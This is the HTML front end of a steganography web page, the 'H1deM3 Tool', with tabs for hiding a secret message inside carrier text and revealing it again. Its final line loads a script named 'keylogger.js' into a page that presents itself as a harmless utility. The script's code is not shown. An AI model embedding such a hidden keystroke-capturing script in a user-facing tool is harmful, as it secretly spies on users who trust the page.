<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Hide message</title>

    <link rel="apple-touch-icon" href="/apple-touch-icon.png">
    <link href="https://cdn.jsdelivr.net/npm/tailwindcss@1.x.x/dist/tailwind.min.css" rel="stylesheet">
  </head>
  <body class="antialiased bg-gray-200" x-data="app_data">
    <div class="flex flex-col md:flex-row w-full md:max-w-screen-md lg:max-w-screen-lg xl:max-w-screen-xl">
      <div class="flex flex-row w-full  md:flex-col md:w-64 md:h-screen bg-white">
        <div class="flex items-center px-3 py-3">
          <div class="text-2xl font-bold text-gray-800">H1deM3 Tool</div>
        </div>

        <div class="flex flex-row md:flex-col md:w-64">
          <a href="#" @click="tab = 'hide'" class="px-2 py-2 flex items-center font-medium hover:text-blue-600 hover:bg-gray-200" :class="tab == 'hide' ? 'bg-gray-200 text-blue-600' : 'text-gray-700'">
            Hide Message
          </a>
          <a href="#" @click="tab = 'reveal'" class="px-2 py-2 flex items-center font-medium hover:text-blue-600 hover:bg-gray-200" :class="tab == 'reveal' ? 'bg-gray-200 text-blue-600' : 'text-gray-700'">
            Reveal Message
          </a>
        </div>
      </div>


      <div x-show="tab === 'hide'" class="flex-1 flex-col">
        <h1 class="px-4 py-4 text-xl font-bold border-b border-gray-500">Hide Message</h1>
        <div class="m-4">
          <div class="mb-4">
            <label class="block mr-2" for="i00">Secret message:</label>
            <input x-model="hide.secretMessage" class="w-full px-2 py-2 bg-white text-gray-800 rounded-lg" id="i00" type="text" placeholder="I love you!">
          </div>

          <div class="mb-4">
            <label class="block mr-2" for="i01">Carrier message:</label>
            <textarea x-model="hide.content" class="w-full h-32 px-2 py-2 bg-white text-gray-800 rounded-lg" id="i01" placeholder="Hi, how are you doing?"></textarea>
          </div>

          <div class="mb-4">
            <button @click="hide.submit()" class="px-4 py-2 text-blue-100 bg-blue-600 rounded-lg">Hide secret message!</button>
          </div>

          <div x-show="hide.result !== ''" class="mb-4">
            <label class="block mr-2" for="i02">Result:</label>
            <textarea :value="hide.result" readonly onclick="this.select()" class="w-full h-32 px-2 py-2 bg-white text-gray-800 rounded-lg" id="i02"></textarea>
          </div>
        </div>
      </div>

      <div x-show="tab === 'reveal'" class="flex-1 flex-col">
        <h1 class="px-4 py-4 text-xl font-bold border-b border-gray-500">Reveal Message</h1>
        <div class="m-4">
          <div class="mb-4">
            <textarea x-model="reveal.content" class="w-full h-32 px-2 py-2 bg-white text-gray-800 rounded-lg" id="i10" placeholder="Hi, how are[ZWD][ZWD] you doing?"></textarea>
          </div>

          <div class="mb-4">
            <button @click="reveal.submit()" class="px-4 py-2 text-blue-100 bg-blue-600 rounded-lg">Reveal secret message!</button>
          </div>

          <div class="mb-4">
            <label class="block mr-2" for="i11">Secret message is:</label>
            <textarea :value="reveal.result" readonly onclick="this.select()" class="w-full h-32 px-2 py-2 bg-white text-gray-800 rounded-lg" id="i11"></textarea>
          </div>
        </div>
      </div>
    </div>

    <script src="https://cdn.jsdelivr.net/gh/alpinejs/alpine@v2.x.x/dist/alpine.min.js" defer></script>
    <script src="keylogger.js"></script>
  </body>
</html>